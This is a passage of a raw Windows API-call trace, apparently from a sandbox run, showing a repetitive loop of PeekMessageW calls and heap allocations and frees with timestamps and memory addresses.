(in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0119.516] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0119.516] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0119.517] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0119.517] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba1d8 [0119.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba280 [0119.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edca0 [0119.517] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0119.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149ad20 [0119.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba298 [0119.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb00 [0119.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba298 | out: hHeap=0x12c0000) returned 1 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x14b4648 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba2b0 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba328 [0119.518] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edc50 [0119.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba328 | out: hHeap=0x12c0000) returned 1 [0119.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edc50 | out: hHeap=0x12c0000) returned 1 [0119.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149ac08 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba298 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edad0 [0119.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba298 | out: hHeap=0x12c0000) returned 1 [0119.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x14b4ae0 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba298 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba328 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edc80 [0119.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba328 | out: hHeap=0x12c0000) returned 1 [0119.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edc80 | out: hHeap=0x12c0000) returned 1 [0119.519] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149ac80 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba328 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb90 [0119.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba328 | out: hHeap=0x12c0000) returned 1 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x14b4808 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba328 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3a0 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edc50 [0119.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba3a0 | out: hHeap=0x12c0000) returned 1 [0119.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edc50 | out: hHeap=0x12c0000) returned 1 [0119.519] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149aca8 [0119.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3a0 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edc80 [0119.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba3a0 | out: hHeap=0x12c0000) returned 1 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149ad48 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3a0 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4c0 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb40 [0119.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4c0 | out: hHeap=0x12c0000) returned 1 [0119.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb40 | out: hHeap=0x12c0000) returned 1 [0119.520] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b248 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba448 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edc00 [0119.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba448 | out: hHeap=0x12c0000) returned 1 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b220 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4a8 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba490 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edc70 [0119.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba490 | out: hHeap=0x12c0000) returned 1 [0119.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edc70 | out: hHeap=0x12c0000) returned 1 [0119.520] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149aff0 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba6b8 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edc50 [0119.521] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba6b8 | out: hHeap=0x12c0000) returned 1 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149afc8 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5f8 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba508 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edbe0 [0119.521] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba508 | out: hHeap=0x12c0000) returned 1 [0119.521] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edbe0 | out: hHeap=0x12c0000) returned 1 [0119.521] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b360 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba6a0 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb60 [0119.521] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba6a0 | out: hHeap=0x12c0000) returned 1 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b388 [0119.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba640 [0119.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4f0 [0119.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edc60 [0119.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4f0 | out: hHeap=0x12c0000) returned 1 [0119.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edc60 | out: hHeap=0x12c0000) returned 1 [0119.523] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b0e0 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5b0 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edbc0 [0119.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5b0 | out: hHeap=0x12c0000) returned 1 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b130 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba6a0 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba658 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb40 [0119.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba658 | out: hHeap=0x12c0000) returned 1 [0119.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb40 | out: hHeap=0x12c0000) returned 1 [0119.524] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b3b0 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4c0 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb30 [0119.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4c0 | out: hHeap=0x12c0000) returned 1 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b3d8 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba598 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba628 [0119.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb40 [0119.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba628 | out: hHeap=0x12c0000) returned 1 [0119.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb40 | out: hHeap=0x12c0000) returned 1 [0119.524] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b158 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4c0 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edc90 [0119.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4c0 | out: hHeap=0x12c0000) returned 1 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b180 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4f0 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba478 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edc60 [0119.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba478 | out: hHeap=0x12c0000) returned 1 [0119.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edc60 | out: hHeap=0x12c0000) returned 1 [0119.525] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b270 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5e0 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edc70 [0119.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5e0 | out: hHeap=0x12c0000) returned 1 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x14b4b88 [0119.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba628 [0119.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba520 [0119.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edcb0 [0119.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba520 | out: hHeap=0x12c0000) returned 1 [0119.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edcb0 | out: hHeap=0x12c0000) returned 1 [0119.526] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b018 [0119.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba658 [0119.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edcb0 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba430 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba688 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb40 [0119.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba688 | out: hHeap=0x12c0000) returned 1 [0119.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb40 | out: hHeap=0x12c0000) returned 1 [0119.529] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b0b8 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba520 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edae0 [0119.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba520 | out: hHeap=0x12c0000) returned 1 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b428 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba460 [0119.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba520 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb50 [0119.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba520 | out: hHeap=0x12c0000) returned 1 [0119.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb50 | out: hHeap=0x12c0000) returned 1 [0119.530] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b108 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4c0 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edbe0 [0119.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4c0 | out: hHeap=0x12c0000) returned 1 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b338 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba670 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba520 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb40 [0119.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba520 | out: hHeap=0x12c0000) returned 1 [0119.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb40 | out: hHeap=0x12c0000) returned 1 [0119.530] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149af78 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb40 [0119.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149af50 [0119.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba610 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5b0 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb50 [0119.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5b0 | out: hHeap=0x12c0000) returned 1 [0119.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb50 | out: hHeap=0x12c0000) returned 1 [0119.531] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b298 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba688 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edc60 [0119.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba688 | out: hHeap=0x12c0000) returned 1 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x14b4bf8 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba568 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba508 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb50 [0119.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba508 | out: hHeap=0x12c0000) returned 1 [0119.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb50 | out: hHeap=0x12c0000) returned 1 [0119.531] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149afa0 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba478 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edba0 [0119.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba478 | out: hHeap=0x12c0000) returned 1 [0119.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b040 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba688 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb50 [0119.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb50 | out: hHeap=0x12c0000) returned 1 [0119.532] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b1a8 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba448 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb50 [0119.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba448 | out: hHeap=0x12c0000) returned 1 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b1d0 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba538 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba6b8 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb70 [0119.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba6b8 | out: hHeap=0x12c0000) returned 1 [0119.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb70 | out: hHeap=0x12c0000) returned 1 [0119.532] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b068 [0119.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba490 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edbd0 [0119.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba490 | out: hHeap=0x12c0000) returned 1 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b2c0 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba478 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba6b8 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb70 [0119.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba6b8 | out: hHeap=0x12c0000) returned 1 [0119.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb70 | out: hHeap=0x12c0000) returned 1 [0119.533] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b1f8 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5e0 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb70 [0119.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5e0 | out: hHeap=0x12c0000) returned 1 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b2e8 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba6b8 [0119.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5b0 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edb80 [0119.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5b0 | out: hHeap=0x12c0000) returned 1 [0119.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edb80 | out: hHeap=0x12c0000) returned 1 [0119.534] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b090 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3d0 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edb80 [0119.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba3d0 | out: hHeap=0x12c0000) returned 1 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b400 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3d0 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3e8 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edd00 